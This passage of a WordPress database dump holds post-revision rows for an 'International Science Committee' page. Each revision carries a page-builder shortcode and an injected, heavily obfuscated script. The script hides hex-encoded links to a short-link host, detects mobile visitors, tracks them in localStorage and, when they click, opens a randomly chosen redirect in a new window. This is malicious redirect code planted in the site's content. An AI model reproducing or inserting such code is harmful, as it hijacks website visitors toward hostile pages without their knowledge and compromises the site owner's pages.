_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 20:53:33','2022-11-04 20:53:33','',2876,'https://gsw2023.com/?p=3011',0,'revision','',0),
(3012,1,'2022-11-04 20:54:45','2022-11-04 20:54:45','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"25px 0px 25px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 20:54:45','2022-11-04 20:54:45','',2876,'https://gsw2023.com/?p=3012',0,'revision','',0),
(3013,1,'2022-11-04 20:56:11','2022-11-04 20:56:11','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"25px 0px 25px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 20:56:11','2022-11-04 20:56:11','',2876,'https://gsw2023.com/?p=3013',0,'revision','',0),
(3014,1,'2022-11-04 20:57:10','2022-11-04 20:57:10','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"15px 0px 15px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 